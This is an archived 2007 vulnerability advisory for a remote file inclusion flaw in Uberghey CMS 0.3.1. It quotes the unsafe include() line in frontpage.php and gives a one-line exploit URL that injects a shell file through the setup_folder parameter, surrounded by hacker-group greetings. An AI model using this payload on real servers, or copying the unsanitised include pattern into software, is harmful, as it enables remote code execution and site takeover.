Uberghey 0.3.1 (frontpage.php) Remote File Include Vulnerability

2007-01-18T00:00:00
ID SECURITYVULNS:DOC:15753
Type securityvulns
Reporter Securityvulns
Modified 2007-01-18T00:00:00

Description

/###################################################################\

Uberghey CMS 0.3.1

=========================================================

Published : 2007-01-17

Remote: Yes

Site:http://switch.dl.sourceforge.net/sourceforge/uberghey/

Author: GolD_M = Mahmood_ali

Contact: HackEr_@W.cN

=====================================================

ThanX=All My Friends-ABDULLAH00-Dr.Hail-MoHaNdKo-SilVeR_FaLCoN-Z4E

SpeciaL GreeTz : TrYaG-Team & 4lKaSrGoLd3N-Team

\###################################################################/ /###################################################################\

In :

/frontpag.php

LiNe:

/17

Vulnerable Code:

include("$setup_folder/i18n/$language/$page_id.inc");

ExPlOiT :

/frontpage.php?setup_folder=shell.txt?

/#######################################\

# TrYaG.Com & DwRaT.Com #

\#######################################/

\############################MAHMOOD_ALI############################/

milw0rm.com [2007-01-17]